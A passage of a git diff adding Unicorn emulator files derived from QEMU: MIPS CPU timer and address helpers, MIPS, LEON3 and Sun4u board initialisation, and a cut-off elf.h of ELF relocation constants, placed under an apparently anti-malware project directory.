MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ + +#include "hw/hw.h" +#include "hw/mips/cpudevs.h" + +uint64_t cpu_mips_kseg0_to_phys(void *opaque, uint64_t addr) +{ + return addr & 0x1fffffffll; +} + +uint64_t cpu_mips_phys_to_kseg0(void *opaque, uint64_t addr) +{ + return addr | ~0x7fffffffll; +} + +uint64_t cpu_mips_kvm_um_phys_to_kseg0(void *opaque, uint64_t addr) +{ + return addr | 0x40000000ll; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/hw/mips/cputimer.c b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/mips/cputimer.c new file mode 100644 index 0000000..71d2881 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/mips/cputimer.c @@ -0,0 +1,131 @@ +/* + * QEMU MIPS timer support + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ + +#include "hw/hw.h" +#include "hw/mips/cpudevs.h" +#include "qemu/timer.h" + +#define TIMER_FREQ 100 * 1000 * 1000 + +/* XXX: do not use a global */ +uint32_t cpu_mips_get_random (CPUMIPSState *env) +{ + static uint32_t lfsr = 1; + static uint32_t prev_idx = 0; + uint32_t idx; + /* Don't return same value twice, so get another value */ + do { + lfsr = (lfsr >> 1) ^ ((0-(lfsr & 1u)) & 0xd0000001u); + idx = lfsr % (env->tlb->nb_tlb - env->CP0_Wired) + env->CP0_Wired; + } while (idx == prev_idx); + prev_idx = idx; + return idx; +} + +/* MIPS R4K timer */ +static void cpu_mips_timer_update(CPUMIPSState *env) +{ +#if 0 + uint64_t now, next; + uint32_t wait; + + now = qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL); + wait = env->CP0_Compare - env->CP0_Count - + (uint32_t)muldiv64(now, TIMER_FREQ, get_ticks_per_sec()); + next = now + muldiv64(wait, get_ticks_per_sec(), TIMER_FREQ); + timer_mod(env->timer, next); +#endif +} + +#if 0 +/* Expire the timer. */ +static void cpu_mips_timer_expire(CPUMIPSState *env) +{ + cpu_mips_timer_update(env); + if (env->insn_flags & ISA_MIPS32R2) { + env->CP0_Cause |= 1 << CP0Ca_TI; + } + //qemu_irq_raise(env->irq[(env->CP0_IntCtl >> CP0IntCtl_IPTI) & 0x7]); +} +#endif + +uint32_t cpu_mips_get_count (CPUMIPSState *env) +{ + if (env->CP0_Cause & (1 << CP0Ca_DC)) { + return env->CP0_Count; + } else { + uint64_t now; + + now = qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL); + //if (timer_pending(env->timer) + // && timer_expired(env->timer, now)) { + // /* The timer has already expired. */ + // cpu_mips_timer_expire(env); + //} + + return env->CP0_Count + + (uint32_t)muldiv64(now, TIMER_FREQ, get_ticks_per_sec()); + } +} + +void cpu_mips_store_count (CPUMIPSState *env, uint32_t count) +{ +#if 0 + /* + * This gets called from cpu_state_reset(), potentially before timer init. + * So env->timer may be NULL, which is also the case with KVM enabled so + * treat timer as disabled in that case. + */ + if (env->CP0_Cause & (1 << CP0Ca_DC) || !env->timer) + env->CP0_Count = count; + else { + /* Store new count register */ + env->CP0_Count = + count - (uint32_t)muldiv64(qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL), + TIMER_FREQ, get_ticks_per_sec()); + /* Update timer timer */ + cpu_mips_timer_update(env); + } +#endif +} + +void cpu_mips_store_compare (CPUMIPSState *env, uint32_t value) +{ + env->CP0_Compare = value; + if (!(env->CP0_Cause & (1 << CP0Ca_DC))) + cpu_mips_timer_update(env); + if (env->insn_flags & ISA_MIPS32R2) + env->CP0_Cause &= ~(1 << CP0Ca_TI); + //qemu_irq_lower(env->irq[(env->CP0_IntCtl >> CP0IntCtl_IPTI) & 0x7]); +} + +void cpu_mips_start_count(CPUMIPSState *env) +{ + cpu_mips_store_count(env, env->CP0_Count); +} + +void cpu_mips_stop_count(CPUMIPSState *env) +{ + /* Store the current value */ + env->CP0_Count += (uint32_t)muldiv64(qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL), + TIMER_FREQ, get_ticks_per_sec()); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/hw/mips/mips_r4k.c b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/mips/mips_r4k.c new file mode 100644 index 0000000..aa1ee11 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/mips/mips_r4k.c @@ -0,0 +1,57 @@ +/* + * QEMU/MIPS pseudo-board + * + * emulates a simple machine with ISA-like bus. + * ISA IO space mapped to the 0x14000000 (PHYS) and + * ISA memory at the 0x10000000 (PHYS, 16Mb in size). + * All peripherial devices are attached to this "bus" with + * the standard PC ISA addresses. +*/ + +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh, 2015 */ + +#include "hw/hw.h" +#include "hw/mips/mips.h" +#include "hw/mips/cpudevs.h" +#include "sysemu/sysemu.h" +#include "hw/boards.h" +#include "exec/address-spaces.h" + + +static int mips_r4k_init(struct uc_struct *uc, MachineState *machine) +{ + const char *cpu_model = machine->cpu_model; + + /* init CPUs */ + if (cpu_model == NULL) { +#ifdef TARGET_MIPS64 + cpu_model = "R4000"; +#else + cpu_model = "24Kf"; +#endif + } + + uc->cpu = (void*) cpu_mips_init(uc, cpu_model); + if (uc->cpu == NULL) { + fprintf(stderr, "Unable to find CPU definition\n"); + return -1; + } + + return 0; +} + +void mips_machine_init(struct uc_struct *uc) +{ + static QEMUMachine mips_machine = { + NULL, + "mips", + mips_r4k_init, + NULL, + 0, + 1, + UC_ARCH_MIPS, + }; + + qemu_register_machine(uc, &mips_machine, TYPE_MACHINE, NULL); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/hw/sparc/Makefile.objs b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/sparc/Makefile.objs new file mode 100644 index 0000000..20bd940 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/sparc/Makefile.objs @@ -0,0 +1 @@ +obj-y += leon3.o diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/hw/sparc/leon3.c b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/sparc/leon3.c new file mode 100644 index 0000000..150aaed --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/sparc/leon3.c @@ -0,0 +1,72 @@ +/* + * QEMU Leon3 System Emulator + * + * Copyright (c) 2010-2011 AdaCore + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ + +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh, 2015 */ + +#include "hw/hw.h" +#include "hw/sparc/sparc.h" +#include "qemu/timer.h" +#include "sysemu/sysemu.h" +#include "hw/boards.h" +#include "exec/address-spaces.h" + + +static int leon3_generic_hw_init(struct uc_struct *uc, MachineState *machine) +{ + const char *cpu_model = machine->cpu_model; + SPARCCPU *cpu; + + /* Init CPU */ + if (!cpu_model) { + cpu_model = "LEON3"; + } + + cpu = cpu_sparc_init(uc, cpu_model); + uc->cpu = CPU(cpu); + if (cpu == NULL) { + fprintf(stderr, "qemu: Unable to find Sparc CPU definition\n"); + return -1; + } + + cpu_sparc_set_id(&cpu->env, 0); + + return 0; +} + +void leon3_machine_init(struct uc_struct *uc) +{ + static QEMUMachine leon3_generic_machine = { + NULL, + "leon3_generic", + leon3_generic_hw_init, + NULL, + 0, + 1, + UC_ARCH_SPARC, + }; + + //printf(">>> leon3_machine_init\n"); + qemu_register_machine(uc, &leon3_generic_machine, TYPE_MACHINE, NULL); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/hw/sparc64/Makefile.objs b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/sparc64/Makefile.objs new file mode 100644 index 0000000..a84cfe3 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/sparc64/Makefile.objs @@ -0,0 +1 @@ +obj-y += sun4u.o diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/hw/sparc64/sun4u.c b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/sparc64/sun4u.c new file mode 100644 index 0000000..1995d31 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/sparc64/sun4u.c @@ -0,0 +1,63 @@ +/* + * QEMU Sun4u/Sun4v System Emulator + * + * Copyright (c) 2005 Fabrice Bellard + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ +#include "hw/hw.h" +#include "hw/sparc/sparc.h" +#include "qemu/timer.h" +#include "sysemu/sysemu.h" +#include "hw/boards.h" +#include "exec/address-spaces.h" + + +/* Sun4u hardware initialisation */ +static int sun4u_init(struct uc_struct *uc, MachineState *machine) +{ + const char *cpu_model = machine->cpu_model; + SPARCCPU *cpu; + + if (cpu_model == NULL) + cpu_model = "Sun UltraSparc IV"; + + cpu = cpu_sparc_init(uc, cpu_model); + if (cpu == NULL) { + fprintf(stderr, "Unable to find Sparc CPU definition\n"); + return -1; + } + + return 0; +} + +void sun4u_machine_init(struct uc_struct *uc) +{ + static QEMUMachine sun4u_machine = { + NULL, + "sun4u", + sun4u_init, + NULL, + 1, // XXX for now + 1, + UC_ARCH_SPARC, + }; + + qemu_register_machine(uc, &sun4u_machine, TYPE_MACHINE, NULL); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/config.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/config.h new file mode 100644 index 0000000..e20f786 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/config.h @@ -0,0 +1,2 @@ +#include "config-host.h" +#include "config-target.h" diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/elf.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/elf.h new file mode 100644 index 0000000..b55aaa6 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/elf.h @@ -0,0 +1,560 @@ +#ifndef QEMU_ELF_H +#define QEMU_ELF_H + +/* + * i386 ELF relocation types + */ +#define R_386_NONE 0 +#define R_386_32 1 +#define R_386_PC32 2 +#define R_386_GOT32 3 +#define R_386_PLT32 4 +#define R_386_COPY 5 +#define R_386_GLOB_DAT 6 +#define R_386_JMP_SLOT 7 +#define R_386_RELATIVE 8 +#define R_386_GOTOFF 9 +#define R_386_GOTPC 10 +#define R_386_NUM 11 +/* Not a dynamic reloc, so not included in R_386_NUM. Used in TCG. */ +#define R_386_PC8 23 + +/* + * Mips ELF relocation types + */ +#define R_MIPS_NONE 0 +#define R_MIPS_16 1 +#define R_MIPS_32 2 +#define R_MIPS_REL32 3 +#define R_MIPS_26 4 +#define R_MIPS_HI16 5 +#define R_MIPS_LO16 6 +#define R_MIPS_GPREL16 7 +#define R_MIPS_LITERAL 8 +#define R_MIPS_GOT16 9 +#define R_MIPS_PC16 10 +#define R_MIPS_CALL16 11 +#define R_MIPS_GPREL32 12 +/* The remaining relocs are defined on Irix, although they are not + in the MIPS ELF ABI. */ +#define R_MIPS_UNUSED1 13 +#define R_MIPS_UNUSED2 14 +#define R_MIPS_UNUSED3 15 +#define R_MIPS_SHIFT5 16 +#define R_MIPS_SHIFT6 17 +#define R_MIPS_64 18 +#define R_MIPS_GOT_DISP 19 +#define R_MIPS_GOT_PAGE 20 +#define R_MIPS_GOT_OFST 21 +/* + * The following two relocation types are specified in the MIPS ABI + * conformance guide version 1.2 but not yet in the psABI. + */ +#define R_MIPS_GOTHI16 22 +#define R_MIPS_GOTLO16 23 +#define R_MIPS_SUB 24 +#define R_MIPS_INSERT_A 25 +#define R_MIPS_INSERT_B 26 +#define R_MIPS_DELETE 27 +#define R_MIPS_HIGHER 28 +#define R_MIPS_HIGHEST 29 +/* + * The following two relocation types are specified in the MIPS ABI + * conformance guide version 1.2 but not yet in the psABI. + */ +#define R_MIPS_CALLHI16 30 +#define R_MIPS_CALLLO16 31 +/* + * This range is reserved for vendor specific relocations. + */ +#define R_MIPS_LOVENDOR 100 +#define R_MIPS_HIVENDOR 127 + +/* + * Sparc ELF relocation types + */ +#define R_SPARC_NONE 0 +#define R_SPARC_8 1 +#define R_SPARC_16 2 +#define R_SPARC_32 3 +#define R_SPARC_DISP8 4 +#define R_SPARC_DISP16 5 +#define R_SPARC_DISP32 6 +#define R_SPARC_WDISP30 7 +#define R_SPARC_WDISP22 8 +#define R_SPARC_HI22 9 +#define R_SPARC_22 10 +#define R_SPARC_13 11 +#define R_SPARC_LO10 12 +#define R_SPARC_GOT10 13 +#define R_SPARC_GOT13 14 +#define R_SPARC_GOT22 15 +#define R_SPARC_PC10 16 +#define R_SPARC_PC22 17 +#define R_SPARC_WPLT30 18 +#define R_SPARC_COPY 19 +#define R_SPARC_GLOB_DAT 20 +#define R_SPARC_JMP_SLOT 21 +#define R_SPARC_RELATIVE 22 +#define R_SPARC_UA32 23 +#define R_SPARC_PLT32 24 +#define R_SPARC_HIPLT22 25 +#define R_SPARC_LOPLT10 26 +#define R_SPARC_PCPLT32 27 +#define R_SPARC_PCPLT22 28 +#define R_SPARC_PCPLT10 29 +#define R_SPARC_10 30 +#define R_SPARC_11 31 +#define R_SPARC_64 32 +#define R_SPARC_OLO10 33 +#define R_SPARC_HH22 34 +#define R_SPARC_HM10 35 +#define R_SPARC_LM22 36 +#define R_SPARC_WDISP16 40 +#define R_SPARC_WDISP19 41 +#define R_SPARC_7 43 +#define R_SPARC_5 44 +#define R_SPARC_6 45 + + +/* Bits present in AT_HWCAP for ARM. */ +#define HWCAP_ARM_IDIVA (1 << 17) + +/* Bits present in AT_HWCAP for s390. */ +#define HWCAP_S390_STFLE 4 + +/* Bits present in AT_HWCAP for Sparc. */ +#define HWCAP_SPARC_VIS3 0x00020000 + +/* Bits present in AT_HWCAP for PowerPC. */ +#define PPC_FEATURE_ARCH_2_06 0x00000100 + +/* Symbolic values for the entries in the auxiliary table + put on the initial stack */ +#define AT_PLATFORM 15 /* string identifying CPU for optimizations */ +#define AT_HWCAP 16 /* arch dependent hints at CPU capabilities */ +#define AT_DCACHEBSIZE 19 /* data cache block size */ +#define AT_ICACHEBSIZE 20 /* instruction cache block size */ + +/* + * 68k ELF relocation types + */ +#define R_68K_NONE 0 +#define R_68K_32 1 +#define R_68K_16 2 +#define R_68K_8 3 +#define R_68K_PC32 4 +#define R_68K_PC16 5 +#define R_68K_PC8 6 +#define R_68K_GOT32 7 +#define R_68K_GOT16 8 +#define R_68K_GOT8 9 +#define R_68K_GOT32O 10 +#define R_68K_GOT16O 11 +#define R_68K_GOT8O 12 +#define R_68K_PLT32 13 +#define R_68K_PLT16 14 +#define R_68K_PLT8 15 +#define R_68K_PLT32O 16 +#define R_68K_PLT16O 17 +#define R_68K_PLT8O 18 +#define R_68K_COPY 19 +#define R_68K_GLOB_DAT 20 +#define R_68K_JMP_SLOT 21 +#define R_68K_RELATIVE 22 + +/* PowerPC relocations defined by the ABIs */ +#define R_PPC_NONE 0 +#define R_PPC_ADDR32 1 /* 32bit absolute address */ +#define R_PPC_ADDR24 2 /* 26bit address, 2 bits ignored. */ +#define R_PPC_ADDR16 3 /* 16bit absolute address */ +#define R_PPC_ADDR16_LO 4 /* lower 16bit of absolute address */ +#define R_PPC_ADDR16_HI 5 /* high 16bit of absolute address */ +#define R_PPC_ADDR16_HA 6 /* adjusted high 16bit */ +#define R_PPC_ADDR14 7 /* 16bit address, 2 bits ignored */ +#define R_PPC_ADDR14_BRTAKEN 8 +#define R_PPC_ADDR14_BRNTAKEN 9 +#define R_PPC_REL24 10 /* PC relative 26 bit */ +#define R_PPC_REL14 11 /* PC relative 16 bit */ +#define R_PPC_REL14_BRTAKEN 12 +#define R_PPC_REL14_BRNTAKEN 13 +#define R_PPC_GOT16 14 +#define R_PPC_GOT16_LO 15 +#define R_PPC_GOT16_HI 16 +#define R_PPC_GOT16_HA 17 +#define R_PPC_PLTREL24 18 +#define R_PPC_COPY 19 +#define R_PPC_GLOB_DAT 20 +#define R_PPC_JMP_SLOT 21 +#define R_PPC_RELATIVE 22 +#define R_PPC_LOCAL24PC 23 +#define R_PPC_UADDR32 24 +#define R_PPC_UADDR16 25 +#define R_PPC_REL32 26 +#define R_PPC_PLT32 27 +#define R_PPC_PLTREL32 28 +#define R_PPC_PLT16_LO 29 +#define R_PPC_PLT16_HI 30 +#define R_PPC_PLT16_HA 31 +#define R_PPC_SDAREL16 32 +#define R_PPC_SECTOFF 33 +#define R_PPC_SECTOFF_LO 34 +#define R_PPC_SECTOFF_HI 35 +#define R_PPC_SECTOFF_HA 36 +/* Keep this the last entry. */ +#ifndef R_PPC_NUM +#define R_PPC_NUM 37 +#endif + +/* ARM relocs. */ +#define R_ARM_NONE 0 /* No reloc */ +#define R_ARM_PC24 1 /* PC relative 26 bit branch */ +#define R_ARM_ABS32 2 /* Direct 32 bit */ +#define R_ARM_REL32 3 /* PC relative 32 bit */ +#define R_ARM_PC13 4 +#define R_ARM_ABS16 5 /* Direct 16 bit */ +#define R_ARM_ABS12 6 /* Direct 12 bit */ +#define R_ARM_THM_ABS5 7 +#define R_ARM_ABS8 8 /* Direct 8 bit */ +#define R_ARM_SBREL32 9 +#define R_ARM_THM_PC22 10 +#define R_ARM_THM_PC8 11 +#define R_ARM_AMP_VCALL9 12 +#define R_ARM_SWI24 13 +#define R_ARM_THM_SWI8 14 +#define R_ARM_XPC25 15 +#define R_ARM_THM_XPC22 16 +#define R_ARM_COPY 20 /* Copy symbol at runtime */ +#define R_ARM_GLOB_DAT 21 /* Create GOT entry */ +#define R_ARM_JUMP_SLOT 22 /* Create PLT entry */ +#define R_ARM_RELATIVE 23 /* Adjust by program base */ +#define R_ARM_GOTOFF 24 /* 32 bit offset to GOT */ +#define R_ARM_GOTPC 25 /* 32 bit PC relative offset to GOT */ +#define R_ARM_GOT32 26 /* 32 bit GOT entry */ +#define R_ARM_PLT32 27 /* 32 bit PLT address */ +#define R_ARM_CALL 28 +#define R_ARM_JUMP24 29 +#define R_ARM_GNU_VTENTRY 100 +#define R_ARM_GNU_VTINHERIT 101 +#define R_ARM_THM_PC11 102 /* thumb unconditional branch */ +#define R_ARM_THM_PC9 103 /* thumb conditional branch */ +#define R_ARM_RXPC25 249 +#define R_ARM_RSBREL32 250 +#define R_ARM_THM_RPC22 251 +#define R_ARM_RREL32 252 +#define R_ARM_RABS22 253 +#define R_ARM_RPC24 254 +#define R_ARM_RBASE 255 +/* Keep this the last entry. */ +#define R_ARM_NUM 256 + +/* ARM Aarch64 relocation types */ +#define R_AARCH64_NONE 256 /* also accepts R_ARM_NONE (0) */ +/* static data relocations */ +#define R_AARCH64_ABS64 257 +#define R_AARCH64_ABS32 258 +#define R_AARCH64_ABS16 259 +#define R_AARCH64_PREL64 260 +#define R_AARCH64_PREL32 261 +#define R_AARCH64_PREL16 262 +/* static aarch64 group relocations */ +/* group relocs to create unsigned data value or address inline */ +#define R_AARCH64_MOVW_UABS_G0 263 +#define R_AARCH64_MOVW_UABS_G0_NC 264 +#define R_AARCH64_MOVW_UABS_G1 265 +#define R_AARCH64_MOVW_UABS_G1_NC 266 +#define R_AARCH64_MOVW_UABS_G2 267 +#define R_AARCH64_MOVW_UABS_G2_NC 268 +#define R_AARCH64_MOVW_UABS_G3 269 +/* group relocs to create signed data or offset value inline */ +#define R_AARCH64_MOVW_SABS_G0 270 +#define R_AARCH64_MOVW_SABS_G1 271 +#define R_AARCH64_MOVW_SABS_G2 272 +/* relocs to generate 19, 21, and 33 bit PC-relative addresses */ +#define R_AARCH64_LD_PREL_LO19 273 +#define R_AARCH64_ADR_PREL_LO21 274 +#define R_AARCH64_ADR_PREL_PG_HI21 275 +#define R_AARCH64_ADR_PREL_PG_HI21_NC 276 +#define R_AARCH64_ADD_ABS_LO12_NC 277 +#define R_AARCH64_LDST8_ABS_LO12_NC 278 +#define R_AARCH64_LDST16_ABS_LO12_NC 284 +#define R_AARCH64_LDST32_ABS_LO12_NC 285 +#define R_AARCH64_LDST64_ABS_LO12_NC 286 +#define R_AARCH64_LDST128_ABS_LO12_NC 299 +/* relocs for control-flow - all offsets as multiple of 4 */ +#define R_AARCH64_TSTBR14 279 +#define R_AARCH64_CONDBR19 280 +#define R_AARCH64_JUMP26 282 +#define R_AARCH64_CALL26 283 +/* group relocs to create pc-relative offset inline */ +#define R_AARCH64_MOVW_PREL_G0 287 +#define R_AARCH64_MOVW_PREL_G0_NC 288 +#define R_AARCH64_MOVW_PREL_G1 289 +#define R_AARCH64_MOVW_PREL_G1_NC 290 +#define R_AARCH64_MOVW_PREL_G2 291 +#define R_AARCH64_MOVW_PREL_G2_NC 292 +#define R_AARCH64_MOVW_PREL_G3 293 +/* group relocs to create a GOT-relative offset inline */ +#define R_AARCH64_MOVW_GOTOFF_G0 300 +#define R_AARCH64_MOVW_GOTOFF_G0_NC 301 +#define R_AARCH64_MOVW_GOTOFF_G1 302 +#define R_AARCH64_MOVW_GOTOFF_G1_NC 303 +#define R_AARCH64_MOVW_GOTOFF_G2 304 +#define R_AARCH64_MOVW_GOTOFF_G2_NC 305 +#define R_AARCH64_MOVW_GOTOFF_G3 306 +/* GOT-relative data relocs */ +#define R_AARCH64_GOTREL64 307 +#define R_AARCH64_GOTREL32 308 +/* GOT-relative instr relocs */ +#define R_AARCH64_GOT_LD_PREL19 309 +#define R_AARCH64_LD64_GOTOFF_LO15 310 +#define R_AARCH64_ADR_GOT_PAGE 311 +#define R_AARCH64_LD64_GOT_LO12_NC 312 +#define R_AARCH64_LD64_GOTPAGE_LO15 313 +/* General Dynamic TLS relocations */ +#define R_AARCH64_TLSGD_ADR_PREL21 512 +#define R_AARCH64_TLSGD_ADR_PAGE21 513 +#define R_AARCH64_TLSGD_ADD_LO12_NC 514 +#define R_AARCH64_TLSGD_MOVW_G1 515 +#define R_AARCH64_TLSGD_MOVW_G0_NC 516 +/* Local Dynamic TLS relocations */ +#define R_AARCH64_TLSLD_ADR_PREL21 517 +#define R_AARCH64_TLSLD_ADR_PAGE21 518 +#define R_AARCH64_TLSLD_ADD_LO12_NC 519 +#define R_AARCH64_TLSLD_MOVW_G1 520 +#define R_AARCH64_TLSLD_MOVW_G0_NC 521 +#define R_AARCH64_TLSLD_LD_PREL19 522 +#define R_AARCH64_TLSLD_MOVW_DTPREL_G2 523 +#define R_AARCH64_TLSLD_MOVW_DTPREL_G1 524 +#define R_AARCH64_TLSLD_MOVW_DTPREL_G1_NC 525 +#define R_AARCH64_TLSLD_MOVW_DTPREL_G0 526 +#define R_AARCH64_TLSLD_MOVW_DTPREL_G0_NC 527 +#define R_AARCH64_TLSLD_ADD_DTPREL_HI12 528 +#define R_AARCH64_TLSLD_ADD_DTPREL_LO12 529 +#define R_AARCH64_TLSLD_ADD_DTPREL_LO12_NC 530 +#define R_AARCH64_TLSLD_LDST8_DTPREL_LO12 531 +#define R_AARCH64_TLSLD_LDST8_DTPREL_LO12_NC 532 +#define R_AARCH64_TLSLD_LDST16_DTPREL_LO12 533 +#define R_AARCH64_TLSLD_LDST16_DTPREL_LO12_NC 534 +#define R_AARCH64_TLSLD_LDST32_DTPREL_LO12 535 +#define R_AARCH64_TLSLD_LDST32_DTPREL_LO12_NC 536 +#define R_AARCH64_TLSLD_LDST64_DTPREL_LO12 537 +#define R_AARCH64_TLSLD_LDST64_DTPREL_LO12_NC 538 +/* initial exec TLS relocations */ +#define R_AARCH64_TLSIE_MOVW_GOTTPREL_G1 539 +#define R_AARCH64_TLSIE_MOVW_GOTTPREL_G0_NC 540 +#define R_AARCH64_TLSIE_ADR_GOTTPREL_PAGE21 541 +#define R_AARCH64_TLSIE_LD64_GOTTPREL_LO12_NC 542 +#define R_AARCH64_TLSIE_LD_GOTTPREL_PREL19 543 +/* local exec TLS relocations */ +#define R_AARCH64_TLSLE_MOVW_TPREL_G2 544 +#define R_AARCH64_TLSLE_MOVW_TPREL_G1 545 +#define R_AARCH64_TLSLE_MOVW_TPREL_G1_NC 546 +#define R_AARCH64_TLSLE_MOVW_TPREL_G0 547 +#define R_AARCH64_TLSLE_MOVW_TPREL_G0_NC 548 +#define R_AARCH64_TLSLE_ADD_TPREL_HI12 549 +#define R_AARCH64_TLSLE_ADD_TPREL_LO12 550 +#define R_AARCH64_TLSLE_ADD_TPREL_LO12_NC 551 +#define R_AARCH64_TLSLE_LDST8_TPREL_LO12 552 +#define R_AARCH64_TLSLE_LDST8_TPREL_LO12_NC 553 +#define R_AARCH64_TLSLE_LDST16_TPREL_LO12 554 +#define R_AARCH64_TLSLE_LDST16_TPREL_LO12_NC 555 +#define R_AARCH64_TLSLE_LDST32_TPREL_LO12 556 +#define R_AARCH64_TLSLE_LDST32_TPREL_LO12_NC 557 +#define R_AARCH64_TLSLE_LDST64_TPREL_LO12 558 +#define R_AARCH64_TLSLE_LDST64_TPREL_LO12_NC 559 +/* Dynamic Relocations */ +#define R_AARCH64_COPY 1024 +#define R_AARCH64_GLOB_DAT 1025 +#define R_AARCH64_JUMP_SLOT 1026 +#define R_AARCH64_RELATIVE 1027 +#define R_AARCH64_TLS_DTPREL64 1028 +#define R_AARCH64_TLS_DTPMOD64 1029 +#define R_AARCH64_TLS_TPREL64 1030 +#define R_AARCH64_TLS_DTPREL32 1031 +#define R_AARCH64_TLS_DTPMOD32 1032 +#define R_AARCH64_TLS_TPREL32 1033 + +/* s390 relocations defined by the ABIs */ +#define R_390_NONE 0 /* No reloc. */ +#define R_390_8 1 /* Direct 8 bit. */ +#define R_390_12 2 /* Direct 12 bit. */ +#define R_390_16 3 /* Direct 16 bit. */ +#define R_390_32 4 /* Direct 32 bit. */ +#define R_390_PC32 5 /* PC relative 32 bit. */ +#define R_390_GOT12 6 /* 12 bit GOT offset. */ +#define R_390_GOT32 7 /* 32 bit GOT offset. */ +#define R_390_PLT32 8 /* 32 bit PC relative PLT address. */ +#define R_390_COPY 9 /* Copy symbol at runtime. */ +#define R_390_GLOB_DAT 10 /* Create GOT entry. */ +#define R_390_JMP_SLOT 11 /* Create PLT entry. */ +#define R_390_RELATIVE 12 /* Adjust by program base. */ +#define R_390_GOTOFF32 13 /* 32 bit offset to GOT. */ +#define R_390_GOTPC 14 /* 32 bit PC rel. offset to GOT. */ +#define R_390_GOT16 15 /* 16 bit GOT offset. */ +#define R_390_PC16 16 /* PC relative 16 bit. */ +#define R_390_PC16DBL 17 /* PC relative 16 bit shifted by 1. */ +#define R_390_PLT16DBL 18 /* 16 bit PC rel. PLT shifted by 1. */ +#define R_390_PC32DBL 19 /* PC relative 32 bit shifted by 1. */ +#define R_390_PLT32DBL 20 /* 32 bit PC rel. PLT shifted by 1. */ +#define 